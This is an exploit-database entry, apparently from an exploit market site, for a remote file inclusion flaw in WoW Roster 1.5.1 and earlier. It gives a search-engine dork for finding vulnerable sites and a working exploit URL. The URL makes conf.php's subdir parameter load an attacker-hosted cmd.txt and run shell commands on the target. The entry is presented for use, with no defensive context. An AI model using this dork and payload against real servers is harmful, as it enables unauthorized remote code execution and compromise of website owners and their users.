[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WoW Roster <= 1.5.1 (subdir) Remote File Include Vulnerability

Author
skulmatic
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-626
Category
web applications
Date add
31-07-2006
Platform
unsorted
==============================================================
WoW Roster <= 1.5.1 (subdir) Remote File Include Vulnerability
==============================================================



--------------------------------------------------------------------------------
Title : WoW Roster <= 1.5.1 Remote File Include Vulnerabilities
###############################################################################
Discovered By Skulmatic
-----------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application :  World of Warcraft (WoW) Roster
URL :  http://www.wowroster.net/
-----------------------------------------------------------------------------

dork        : "wow roster version 1.5.*"
Exploit     : 
http://[target]/[wow_roster_path]/conf.php?subdir=http://[attacker]/cmd.txt?&cmd=ls           
              
------------------------------------------------------------------------------

greatz:
~~~~
# special to song hye kyo (for inspiration)
# To all members of #papmahackerlink and #hackid, OLiBekaS, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster.
-------------------------------------------------------------------------------



#  0day.today [2024-11-15]  #